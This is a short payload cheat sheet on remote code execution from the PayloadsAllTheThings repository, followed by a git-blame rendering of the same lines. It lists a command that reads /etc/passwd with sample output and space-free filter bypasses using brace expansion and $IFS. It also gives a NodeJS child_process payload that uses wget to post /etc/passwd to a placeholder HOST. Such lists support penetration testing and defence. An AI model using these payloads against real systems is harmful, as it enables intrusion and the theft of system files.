PayloadsAllTheThings/RCE/README.md

# Remote Code Execution
Remote code execution is a security vulnerability that allows an attacker to execute codes from a remote server.
	

## Vuln
Normal code execution
```
cat /etc/passwd 
root:x:0:0:root:/root:/bin/bash 
daemon:x:1:1:daemon:/usr/sbin:/bin/sh 
bin:x:2:2:bin:/bin:/bin/sh 
sys:x:3:3:sys:/dev:/bin/sh
```


Code execution without space
```
{cat,/etc/passwd}
cat$IFS/etc/passwd
```

NodeJS Code execution
```
require('child_process').exec('wget+--post-data+"x=$(cat+/etc/passwd)"+HOST')
```

## Thanks to
*
RCE payloads 2016-10-18 06:02:14 +00:00			`# Remote Code Execution`
			`Remote code execution is a security vulnerability that allows an attacker to execute codes from a remote server.`

Init directory with README 2016-10-18 08:01:56 +00:00
			`## Vuln`
RCE payloads 2016-10-18 06:02:14 +00:00			`Normal code execution`
			```
			`cat /etc/passwd`
Update RCE 2016-10-18 06:04:50 +00:00			`root:x:0:0:root:/root:/bin/bash`
			`daemon:x:1:1:daemon:/usr/sbin:/bin/sh`
			`bin:x:2:2:bin:/bin:/bin/sh`
			`sys:x:3:3:sys:/dev:/bin/sh`
RCE payloads 2016-10-18 06:02:14 +00:00			```


			`Code execution without space`
			```
			`{cat,/etc/passwd}`
			`cat$IFS/etc/passwd`
			```
Init directory with README 2016-10-18 08:01:56 +00:00
RCE payloads 2016-10-18 06:02:14 +00:00			`NodeJS Code execution`
Init directory with README 2016-10-18 08:01:56 +00:00			```
RCE payloads 2016-10-18 06:02:14 +00:00			`require('child_process').exec('wget+--post-data+"x=$(cat+/etc/passwd)"+HOST')`
Init directory with README 2016-10-18 08:01:56 +00:00			```

			`## Thanks to`
RCE payloads 2016-10-18 06:02:14 +00:00			`*`